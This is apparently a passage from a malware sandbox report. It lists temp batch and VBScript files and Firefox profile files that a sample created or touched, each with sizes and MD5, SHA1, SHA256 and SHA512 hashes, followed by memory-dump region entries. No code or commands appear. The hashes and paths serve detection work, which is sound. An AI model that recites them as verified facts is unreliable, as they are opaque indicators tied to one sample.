475776f8b96aaef054ebc1ff65f4b4cc062eb393c3b4a2a8936aae5f99078054663539cb7d675f766913fb882319a9cf5c96b3f34963782ca7658e8b9af47c5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ezHXLeVHih.bat
Filesize
214B

MD5
77810b4335ed594a855a7880b98008ee

SHA1
8d780c4cee92a9668747304e0ddbe0b1f42abd70

SHA256
3bc99ab39d09ba42b5ead38aa7c52b0d5df4820c3f05fa09ff3a312b9dd41537

SHA512
f1a7d7006389f64d492bfb764746f2f48b1b23358e3e76ead7343b6be0ca1f4de000b084389d64da5e0ae002840fa4561ddc7f260bdf84ea302d2b5562bae8b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\f4b664ef-c86b-496a-9ca5-a9590ddb7f94.vbs
Filesize
725B

MD5
d6663d5eabe81237c2fe079697eede9c

SHA1
5e2985efcd65da21af558cc9264e02d3d23dd54c

SHA256
c834ad7fdec7f1fda50a6041e1ba4f4e012c34b9c39452b29d2471b18a46746b

SHA512
21699e8c256de776a2ba7260d0085947e962a31cfb5e64ad044ede8935b7b9fabbb30d9af79222d68bd2383eea1b37364b48b00066fd6d27b457708254abbbc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\f6874a1b-1d49-4259-ab6d-df92f726fd91.vbs
Filesize
501B

MD5
c2efd4a95d092088faa254dcbbd4a9cc

SHA1
f1f7da7b614f8ff119c1f826195c70104b1b581e

SHA256
519e9414bce4a77a206a018a115db5d056ef58a54f3541b65dbae40909848afb

SHA512
529678edf4757cb0b47769ff6990389d6f14cd97b1eb66d0652ef338d78b7900323d0d53ef3da3afcb462938db0e6a78c4bec34610dfbef0dfeab5d3776b5388

Download Submit
C:\Users\Admin\AppData\Local\Temp\yMeEqlK1gO.bat
Filesize
214B

MD5
42cc1e1da9b9fc5e637783575770336e

SHA1
c12719c9b2e33551afc2666f0d84567a501662e8

SHA256
0709f3f4c08b17d4e2b11c1d08db1d7d5f1ee8f8fe2204ccab72b154efc5fc00

SHA512
48054f5fbd19c5f908c2fd320628becc6efaf2f6049a724d149c23dca98a4af3776e637b071e5f516460d0811eaec644c4f7d0f10e20cd474c7b90c3039a3fd5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\db\data.safe.bin
Filesize
2KB

MD5
f43250a492e56487496f75e446c5526e

SHA1
1c8cd6dee90e6707d84fc2ad45bd2cdca90ef5ec

SHA256
d4e7d4965fda7755454f053caeaf438aa473e5a3b59a74f519d77960873ac2ac

SHA512
a62870f003a6def86b2f1afe2b7c9f359a6c71022263cb98aa6564c31cff7d1220fb4b338e05aa77b7f9dd1b7276639e6ae6a17fd5bbe4be379c8d9eaaa1961e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\pending_pings\ab9f2059-7271-4c97-9941-46a8e51c50e0
Filesize
746B

MD5
0c53b923b829c50b378b8b5cb97a1ac6

SHA1
56d5a9fe865541cc1beaac015d4ec029ec8b4838

SHA256
7e9cc9332501d2ebb7c16c8d97a8cfcb79d9ea90b6939befdbd415b9d36cfad8

SHA512
f185d26c4ddb029d8cd9111cf649b9ddfe55eef2964079bfab066224dc98afe66576d21fa1ee35e4b5475f5d2cc1071b31ad5cd87300633abda071791a91dccf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\pending_pings\d05ed70c-1c91-42ae-8ce2-3793cfc73796
Filesize
10KB

MD5
d7d9b279398dc5b0065c2f3beade9e25

SHA1
8a27ef3607145d888342cedea2303649eb9732b3

SHA256
d1e27a72ace3ce5ed840b732bd2f25fe85afe97dfd9a73da1ac51d8f1e5aa62c

SHA512
b0d6b82a0567e570034d0550be1c2070a9037715efdb648dd104f6e3120cf8063faa7c4a9299dcda8a593f39960dfaef910f92b012cd022933b3dfc42f03f893

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs-1.js
Filesize
6KB

MD5
3112e8f79c720a68b019ce6b1782f1fc

SHA1
0a0d4a7f2acd6729009878a7a4f30b9e4f87d52d

SHA256
3eafeeda3bf2e78a720fc7c527339934178a7aeb44f116d11ee2ef053f521f13

SHA512
a3f21e1b296c62f34e397a5d83b7654b5bc42d2726e149eadbba70bbd505117271373c662ed5b34ebcf4cb2c2f618e4753c277351fb0853cd47463b7975ff6c5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs-1.js
Filesize
6KB

MD5
42914f21f3d27705b806c2d9e070baf2

SHA1
30fbf3be4da62e4cc227fe3862cdf2dd77eff328

SHA256
8c0582bb04857a41dacf013ecc37541fa5f218fd12f1f9f89e31785143d73fb4

SHA512
4ca576369ad5084517de52f69b6b2a10e3498b65b8a69dbe8507630f33198268171fe34740d689406831f80a17522999e934cbb5f091f43215952b9b13f448b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js
Filesize
6KB

MD5
9c4fb20d86d258b1fd4abd493e3f38c6

SHA1
fc8abee1c15bcc3f529c6b3ebbc917abbfc6ec73

SHA256
823026e96fdaf71a485cd174a69fcd1071e8d417a5dbb164c1f3d7bdef65d9e9

SHA512
9ae1eb125236071dac619056a34d3f558aaad8eb1339463d2d2ee9e32748613762e3117135983dccaa623f0ed32525b5482243a92bf8dbd4f4346b297ac62ad7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
1KB

MD5
a39f12d5b694aae04a24ef19c356cd44

SHA1
0c7ef30029a9d046dde50dda1ee212b1ffa9275b

SHA256
bd8ab16259c186a3f70915bccc73638d9877816c0b8e35341e59092c3b91fa63

SHA512
32fa44d2ba0026fb87587069028c2d7201959fe4f919f08568b9c32afb5359e84c5aa9f51ae0d0b9526bb023941612f4e71a040a3d5f577cb51281d554ed7c5b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
1KB

MD5
54f168d12e6c735776bb2130297d35ea

SHA1
7798d008ceb4215460cb98e9f741373e6cd1a4f5

SHA256
a436df36b39f7fee1a79519cdfbbc49d8af53ff1739a93d46d61e941a4652f24

SHA512
baff099d922f1a88d7f1bdab1a0a46311cde5775298798857c6978a4e0a5ae7650c3d77d0677b2387fa1fddd818df8fe3c59f51c0764237fd13e4fb5713db56c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
898fbb616a31d8065c541f7a8a81c5c5

SHA1
e8eb8060cedb2a98e5c05133ebe0436af0ababf4

SHA256
7b70bfe8f4ac0acab860c46f449e0bfcf8be4ddec0725416027a6e307f3d23a9

SHA512
87ef96d149eed2a1034c6bd4a143b1b5a033eb3518708c36444f7805a3d3b4ee2120fa34c6b6767a29b9f3551ad372b798cd356768006dbec8466c5e475e17dc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\108\{554af20f-4ca7-42d5-aba8-926e250f5d6c}.final
Filesize
231B

MD5
45e25bb134343fe4a559478cd56f0971

SHA1
79f18ad0b7e3935c3231ced0edd8ea3c7997ca93

SHA256
dae4dd8e56ccc952312b3b238a1db294d4d7ad4f532c31cd1c2e5f9dee881678

SHA512
9b32b125c4183fe992630bc6ce9a511157959556fdce53f8264aba2aa8fb7b0e53b408b505da2cc96cdec771470927e74cba3bbd6eb71a5077e9f933cdc85292

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\171\{9174722f-37cb-4a1e-a790-9a74f3fdd4ab}.final
Filesize
4KB

MD5
df8360f4d08ca67d1bd33fb7fc8c4cc0

SHA1
a2fb7401d5a08066a1ca07b82bb7a49e77167166

SHA256
408ca3a4a5f5b50cf5998c2748ca07f31626c21585e82e9521f61c21af7103da

SHA512
366c718baf873eabbb68717fb5e6901ef58c8d5ff9d673f8462f3fe05c9718bcbf32f878395cb65ea4996445d5c2bf90308d16c6f23027679a61287bbc9f964f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\196\{9bacd01e-18c9-452c-8881-830b14821ec4}.final
Filesize
132B

MD5
be203547ce77fa7a91259437b55c0d1f

SHA1
cff2ff2c9469ac96eff7baaa308cdc886fab804d

SHA256
e5f9c781a4756c64455652d9b4bd944aab9ecc1eef556814c00b1797209f4840

SHA512
adf00778a63ea8a143f8fbbf61188392a87a376234e17856339036854cff3a5247aed0b1c0b603332e244d348d58402ba58b32f6df6cc8e18f9d8242f6573f71

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\45\{7706fb7f-8df4-4615-8bfc-727a0bf5352d}.final
Filesize
3KB

MD5
5b0f165bbdb71faa1bb5b26c4f022e96

SHA1
704bbe81e0d8370e675246e1cbb347bf8599aa45

SHA256
b95a445bd9d295276e8423f1ad3fc50c740512a634f2115364217544bc87d44f

SHA512
6c521b2c55135ec98f79193bf9c62b73cfb1801cdeed03a9871878f677aacea46cae165a4290682768ca1c1192dff2e87b63c39228164d72d2c7abbe732f8d20

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\57\{fe1cf766-aae7-4cc4-a96e-3a7278841639}.final
Filesize
192B

MD5
2a252393b98be6348c4ba18003cc3471

SHA1
40f75302fcbe4a8ac2e33a8d9daf801abc2a9598

SHA256
04cae3c7b208fc55b25763913d0bbdc99232942086efdf705f2a27764be6f5ee

SHA512
07af4a7b0d10f1b5e1fe0877b21abc98483d78797608a1763cfb71e25559fdce10d20f03c16f4284d7ae7ab90266f45240425e3a264de9525ec1657345b85198

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\cache\morgue\9\{880d26f2-70ec-4258-a112-6466af839209}.final
Filesize
168B

MD5
51bb0fe00991a2ae6707b3aefc583918

SHA1
21ec201ebf41ad57faaab02f7961ce5a746e6dbb

SHA256
97dc140355b2b45b54c3dab1ac66b951afae0bc742402cbc342be117f4424e0a

SHA512
41863cc0f1252366a5514dd62a06f4bba493029b8c7a35e19173b6d7f9114e7098fa35d284623b6641d28f7d7bee1ce99064987afc985dbf0354368f71f9a39b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\storage\default\https+++www.youtube.com\idb\2159612328yCt7-%iCt7-%rce6s1p3o.sqlite
Filesize
48KB

MD5
18f8e5745c9802ad14557624a05993f3

SHA1
0a691e4ffb69b4ac12a9a4248df5feb1dae9906d

SHA256
6cf98a42b1cdc78f2ec29c2f3928f54576e202418c0fa208a50ada9b06d93317

SHA512
584626d334923af091326d10779d019c0fcd563f814f09e8a6fe4611e32317b7cf0b8355eb2980ceed3feb709f1a88a20d2ffa5457b490c88683400f6a9d4fdc

Download Submit
memory/244-122-0x0000015D68610000-0x0000015D68632000-memory.dmp

Filesize
136KB

Download
memory/1548-130-0x000001AE47580000-0x000001AE475F6000-memory.dmp

Filesize
472KB

Download
memory/5032-15-0x0000000002440000-0x000000000245C000-memory.dmp

Filesize
112KB

Download
memory/5032-19-0x000000001AD90000-0x000000001AD9C000-memory.dmp

Filesize
48KB

Download
memory/5032-22-0x000000001B420000-0x000000001B42E000-memory.dmp

Filesize
56KB

Download
memory/5032-18-0x0000000002460000-0x000000000246A000-memory.dmp

Filesize
40KB

Download
memory/5032-16-0x000000001B450000-0x000000001B4A0000-memory.dmp

Filesize
320KB

Download
memory/5032-14-0x0000000000170000-0x00000000002C6000-memory.dmp

Filesize
1.3MB

Download
memory/5032-23-0x000000001B430000-0x000000001B43A000-memory.dmp

Filesize
40KB

Download
memory/5032-24-0x000000001B440000-0x000000001B44C000-memory.dmp

Filesize
48KB

Download
memory/5032-21-0x000000001B410000-0x000000001B41E000-memory.dmp

Filesize
56KB

Download
memory/5032-20-0x000000001B400000-0x000000001B40A000-memory.dmp

Filesize
40KB

Download
memory/5032-17-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download